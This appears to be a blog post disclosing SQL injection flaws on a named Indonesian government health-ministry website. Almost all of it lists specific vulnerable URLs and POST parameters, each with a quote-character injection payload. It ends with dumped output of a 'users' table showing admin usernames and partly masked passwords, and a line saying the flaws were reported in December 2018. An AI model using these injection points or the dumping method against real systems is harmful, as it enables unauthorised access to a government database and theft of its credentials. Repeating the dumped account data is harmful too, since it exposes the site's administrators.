Thursday, January 31, 2019

BUGS http://apif.binfar.depkes.go.id

Domain : http://apif.binfar.depkes.go.id
Vuln : SQL Injection
Risk Level : HIGH


SQL Injection:
| [+] Vul [SQL-i] http://apif.binfar.depkes.go.id/?req=view_news&p=news&per_page=3'              
           
| [+] Vul [SQL-i] http://apif.binfar.depkes.go.id/index.php?req=view_search&p=pemetaanIndustriFarmasi              
| Post data: &propinsi=123'

| [+] Vul [SQL-i] http://apif.binfar.depkes.go.id/index.php?req=view_search&p=pemetaan              
| Post data: &propinsi=123'&kabupaten=123&category=123  

| [+] Vul [SQL-i] http://apif.binfar.depkes.go.id/index.php?req=view_search&p=pemetaanApotek              
| Post data: &propinsi=123'

| [+] Vul [SQL-i] http://apif.binfar.depkes.go.id/index.php?req=view_search&p=pemetaanPBF              
| Post data: &propinsi=123'  

| [+] Vul [SQL-i] http://apif.binfar.depkes.go.id/index.php?req=view_search&p=pemetaanKosmetika              
| Post data: &propinsi=123'  

| [+] Vul [SQL-i] http://apif.binfar.depkes.go.id/index.php?req=view_search&p=pemetaanIkot              
| Post data: &propinsi=123'

| [+] Vul [SQL-i] http://apif.binfar.depkes.go.id/index.php?req=view_search&p=pemetaanTokoobat              
| Post data: &propinsi=123'

| [+] Vul [SQL-i] http://apif.binfar.depkes.go.id/index.php?req=view_search&p=pemetaanPBBBF              
| Post data: &propinsi=123'

| [+] Vul [SQL-i] http://apif.binfar.depkes.go.id/index.php?req=view_search&p=pemetaanIot              
| Post data: &propinsi=123'  

| [+] Vul [SQL-i] http://apif.binfar.depkes.go.id/index.php?req=view_search&p=pemetaantokoalkes              
| Post data: &propinsi=123'  

| [+] Vul [SQL-i] http://apif.binfar.depkes.go.id/index.php?req=view_search&p=pemetaanindustri_rtpangan              
| Post data: &propinsi=123'

Database: pemetaan
Table: users
[2 entries]
adminapif : apif******
baguz : admin******


---
Reported on 27 December 2018.
